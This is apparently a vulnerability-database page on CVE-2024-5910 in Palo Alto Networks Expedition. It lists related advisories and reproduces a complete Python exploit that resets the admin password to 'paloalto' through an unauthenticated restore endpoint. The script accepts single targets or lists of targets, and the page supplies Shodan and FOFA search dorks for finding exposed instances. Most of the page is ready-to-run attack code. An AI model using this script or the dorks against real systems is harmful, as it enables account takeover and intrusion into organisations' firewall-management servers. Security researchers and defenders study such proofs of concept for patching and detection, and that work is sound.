| Reporter | Title | Published | Views | Family All 30 |
|---|---|---|---|---|
| Palo Alto Expedition 1.2.91 Remote Code Execution Exploit | 14 Nov 202400:00 | – | zdt | |
| CVE-2024-5910 | 10 Jul 202400:00 | – | attackerkb | |
| CVE-2024-5910 | 10 Jul 202421:49 | – | circl | |
| Palo Alto Networks Expedition Missing Authentication Vulnerability | 7 Nov 202400:00 | – | cisa_kev | |
| CISA Adds Four Known Exploited Vulnerabilities to Catalog | 7 Nov 202412:00 | – | cisa | |
| Palo Alto Networks Expedition Security Breach | 10 Jul 202400:00 | – | cnnvd | |
| CVE-2024-5910 | 10 Jul 202418:39 | – | cve | |
| CVE-2024-5910 Expedition: Missing Authentication Leads to Admin Account Takeover | 10 Jul 202418:39 | – | cvelist | |
| Exploit for OS Command Injection in Paloaltonetworks Expedition | 9 Oct 202416:36 | – | githubexploit | |
| Palo Alto Expedition Remote Code Execution (CVE-2024-5910 and CVE-2024-9464) | 13 Nov 202418:55 | – | metasploit |
# Exploit Title: Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover
# Shodan Dork: html:"expedition project" #
# FOFA Dork: "expedition project" && icon_hash="1499876150" #
# Exploit Author: ByteHunter #
# Email: [email protected] #
# Vulnerable Versions: 1.2 < 1.2.92 #
# Tested on: 1.2.90.1 & 1.2.75 #
# CVE : CVE-2024-5910 #
############################ #
################################################################################################
import requests
import argparse
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter("ignore", InsecureRequestWarning)
ENDPOINT = '/OS/startup/restore/restoreAdmin.php'
def send_request(base_url):
url = f"{base_url}{ENDPOINT}"
print(f"Testing URL: {url}")
try:
response = requests.get(url, verify=False, timeout=7)
if response.status_code == 200:
print("✓ Admin password restored to: 'paloalto'\n")
print("✓ admin panel is now accessable via ==> admin:paloalto creds")
else:
print(f"Request failed with status code: {response.status_code}\n")
except requests.exceptions.RequestException as e:
print(f"Error sending request to {url}") #{e}
def main():
parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
parser.add_argument('-u', '--url', type=str, help='single target URL')
parser.add_argument('-l', '--list', type=str, help='URL target list')
args = parser.parse_args()
if args.url:
send_request(args.url)
elif args.list:
try:
with open(args.list, 'r') as file:
urls = file.readlines()
for base_url in urls:
send_request(base_url.strip())
except FileNotFoundError:
print(f"File not found: {args.list}")
else:
print("I need a URL address with -u or a URL file list with -l.")
if __name__ == '__main__':
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation